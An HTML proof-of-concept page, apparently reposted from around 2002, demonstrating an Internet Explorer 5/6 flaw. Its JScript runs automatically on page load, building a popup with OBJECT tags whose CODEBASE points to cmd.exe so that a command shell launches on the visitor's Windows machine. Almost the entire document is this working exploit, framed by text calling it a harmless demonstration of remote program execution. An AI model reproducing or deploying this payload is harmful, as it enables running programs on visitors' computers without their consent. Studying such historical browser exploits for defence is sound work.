日期:2009-04-02  浏览次数:20997 次

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>
<style type="text/css">
BODY{font-family:Arial,Helvetica,sans-serif;font-size:16px;color:#222222;background-color:#aaaabb}
H1{background-color:#222222;color:#aaaabb}
</style>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>

var programName=new Array(
    'c:/windows/system32/cmd.exe',
    'c:/winnt/system32/cmd.exe',
    'c:/cmd.exe'
);

function Init(){
    var oPopup=window.createPopup();
    var oPopBody=oPopup.document.body;
    var n,html='';
    for(n=0;n<programName.length;n++)
        html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
    oPopBody.innerHTML=html;
    oPopup.show(290, 190, 200, 200, document.body);
}

</SCRIPT>
</head>
<BODY onload="Init()">
<H1>Hmm, let's start a command shell...</H1>
<p>
This page doesn't do anything malicious, but is a demonstration of how to execute a program on a remote machine using the
marvelously secure Internet Explorer web browser!!
</p>
<p>
Up until at least 18/02/02, this script would open a command window when viewed in IE5/6 under WindowsXP and Win2k (possibly also WinME). There
are currently no patches available using "Windows Update" which will prevent this.
</p>
</BODY>
</HTML>